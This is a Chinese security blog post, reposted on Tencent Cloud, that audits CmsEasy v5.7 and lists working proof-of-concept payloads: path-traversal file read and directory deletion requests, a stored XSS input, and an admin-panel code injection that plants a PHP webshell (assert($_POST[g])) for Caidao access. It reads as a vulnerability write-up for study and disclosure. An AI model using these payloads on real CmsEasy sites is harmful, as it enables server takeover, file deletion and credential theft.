学习
实践
活动
工具
TVP
写文章
专栏首页BypassCmsEasy_v5.7 漏洞测试

CmsEasy_v5.7 漏洞测试

01

前言

下载了一套CMS,看了一下,部分代码加密,也懒得去解密了,费事。直接登录后台进行黑盒结合白盒进行测试,也发现了一些问题,汇总一下,不做具体代码分析。

02

环境准备

CmsEasy官网:http://www.cmseasy.cn

网站源码版本:CmsEasy_v5.7_UTF8-0208

程序源码下载: http://ftp.cmseasy.cn/CmsEasy5.x/CmsEasy_5.7_UTF-8_20180208.zip

默认后台: http://127.0.0.1/index.php?case=admin&act=login&admin_dir=admin&site=default

查看CMS版本:http://127.0.0.1/cache/data/inf.txt

账号密码 自设

03

任意文件读取

读取config.php配置文件内容

Payload:http://127.0.0.1/index.php?case=template&act=fetch&admin_dir=admin&site=default

【POST】:&id=../../config/config.php

04

任意目录删除

网站根目录新建test目录作为测试目录

Payload:http://127.0.0.1/index.php?case=database&act=restore&admin_dir=admin&site=default

【POST】:select%5B%5D=../test&submit=+%C3%97+%E5%88%A0%E9%99%A4+

05

存储型XSS

登录后台--模板--自定义标签--添加内容标签:

Payload:1111111111<a href=http://www.baidu.com>百度</a>

06

后台Getshell

代码分析:

漏洞文件位置:/lib/table/table_templatetagwap.php 第3-20行:

1. class table_templatetag extends table_mode {  
2.     function vaild() {  
3.  if(!front::post('name')) {  
4.             front::flash('请填写名称!');  
5.  return false;  
6.         }  
7.  if(!front::post('tagcontent')) {  
8.             front::flash('请填写内容!');  
9.  return false;  
10.        }  
11. return true;  
12.    }  
13.    function save_before() {  
14. if(!front::post('tagfrom')) front::$post['tagfrom']='define';  
15. if(!front::post('attr1')) front::$post['attr1']='0';  
16. if(front::$post['tagcontent']) front::$post['tagcontent'] = htmlspecialchars_decode(front::$post['tagcontent']);  
17.    }  
18.}  

可以看到在写入文件之前,使用htmlspecialchars_decode函数把预定义的 HTML 实体"<"(小于)和 ">"(大于)转换为字符。因此我们可以使用双引号闭合,从而构造出Payload写入文件,进一步触发代码,导致程序在实现上存在代码执行漏洞。攻击者可通过构造恶意脚本代码写入配置文件,从而执行命令,控制网站服务器权限。

漏洞利用:

1、登录后台,模板--自定义标签—添加自定义标签--填写Payload—提交: Payload: 1111111111";}<?php phpinfo()?>

2、提交保存后,点击预览,成功触发代码,或者查看id的值,然后直接访问文件路径:http://127.0.0.1/config/tag/category_13.php

3、附绕代码检测的一句话Payload: 11";}<?php assert($_POST[g]);?>

通过菜刀连接,控制网站服务器:

07

总结

一次不太成功的代码审计日志,因部分代码加密,使用黑盒结合白盒的手法,根据功能点进行审计,可以快速发掘程序中存在的安全漏洞。接下来,将不定时更新各种CMS的代码审计文章,欢迎志同道合的朋友来相互探讨,交流。

Bypass

About Me

一个网络安全爱好者,对技术有着偏执狂一样的追求。致力于分享原创高质量干货,包括但不限于:渗透测试、WAF绕过、代码审计、安全运维。

文章分享自微信公众号:
Bypass

本文参与 腾讯云自媒体分享计划 ,欢迎热爱写作的你一起参与!

作者:Bypass
原始发表时间:2018-03-05
如有侵权,请联系 cloudcommunity@tencent.com 删除。
登录 后参与评论
0 条评论

相关文章

  • 渗透测试越权漏洞测试详情

    最近忙于工作没有抽出时间来分享渗透测试文章,索性今天由我们Sinesafe的高级渗透大牛给大家详细讲下主要在业务中发现逻辑和越权的漏洞检测方法,希望大家能对自己...

    技术分享达人
  • 漏洞笔记 | 测试文件

    Web应用程序在开发过程中,程序员为了测试代码功能,在Web目录下新建测试目录,存放测试代码,可能包含敏感信息。

    TeamsSix
  • 漏洞笔记 | 测试目录

    Web应用程序在开发过程中,程序员为了测试代码功能,在Web目录下新建测试目录,存放测试代码,可能包含敏感信息。

    TeamsSix
  • 逻辑漏洞之并发测试

    链接地址:https://v.qq.com/x/page/e3250pbj1ys.html

    小生观察室
  • 渗透测试安全检测漏洞

    最近渗透测试工作比较多没有空闲的时间来写文章,今天由我们Sine安全的渗透主管来普及一下java的安全测试基础,很多客户想要了解具体js的调用漏洞或提交play...

    技术分享达人
  • 渗透测试之XXE漏洞

    XML外部实体注入简称XXE漏洞:XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言...

    贝塔安全实验室
  • VTest - 漏洞测试辅助系统

    VTest - 漏洞测试辅助系统用于辅助安全工程师漏洞挖掘、测试、复现,集合了mock、httplog、dns tools、xss,可用于测试各类无回显、无法直...

    C4rpeDime
  • ThinkPHP5.0 漏洞测试

    由于对控制器名没有明确的检测,在没有开启强制路由的情况下,直接就可以执行phpinfo(),如果服务器未限制shell等函数的执行,便可以直接执行shell提权...

    WindrunnerMax
  • 使用ShellShockHunter测试ShellShock漏洞

    ShellShock,也被称为Bashdoor,是Unix Bash shell中的一系列安全漏洞,第一个漏洞于2014年9月24日披露。ShellShock将...

    FB客服
  • 渗透测试安全检测漏洞

    最近渗透测试工作比较多没有空闲的时间来写文章,今天由我们Sine安全的渗透主管来普及一下java的安全测试基础,很多客户想要了解具体js的调用漏洞或提交play...

    网站安全专家
  • 网站漏洞测试怎样才能找出漏洞问题原因

    2020年,刚刚开始WordPress博客系统被网站安全检测出有插件绕过漏洞,该插件的开发公司,已升级了该插件并发布1.7版本,对以前爆出的漏洞进行了修补,该企...

    网站安全专家
  • 网站渗透测试对接口功能漏洞测试分析

    首先是渗透接口测试:在安全工程师角度看这就是1个十分好的知识要点积累的方式,不仅有利于你现在每次的网站渗透测试中不遗漏掉某一点,而且还能够在队伍里面开展分享有利...

    网站安全专家
  • 渗透测试——漏洞扫描工具整理

    https://www.toutiao.com/i6852189010765447687/

    7089bAt@PowerLi
  • 逻辑漏洞之并发测试【2】

    逆向小白
  • 安全渗透测试网站漏洞问题

    前不久接到朋友的寻求帮助(前提必须要有授权许可,可不能乱渗透测试),就是说有个站搞不了了,让我看看能否协助整一下;恰好近期应急处置结束了在看系统日志,看的有点苦...

    技术分享达人
  • 逻辑漏洞之并发测试【1】

    并发测试主要测试场景:签到、每天领积分等,测试是否并发发送请求服务器可多次响应。

    逆向小白
  • Docker入门&漏洞测试环境搭建

    Docker是一个开源的应用容器引擎,基于 Go语言,并遵从Apache2.0协议开源。 Docker可以让开发者打包他们的应用以及依赖包到一个轻量级、可移植的...

    tinyfisher
  • 渗透测试 漏洞扫描_系统漏洞扫描工具有哪些

    软件实现的缺陷 微软开发人员的单体测试缺陷从超过25个缺陷/千行代码显著降低到7个缺陷/千行代码

    全栈程序员站长

扫码关注腾讯云开发者

领取腾讯云代金券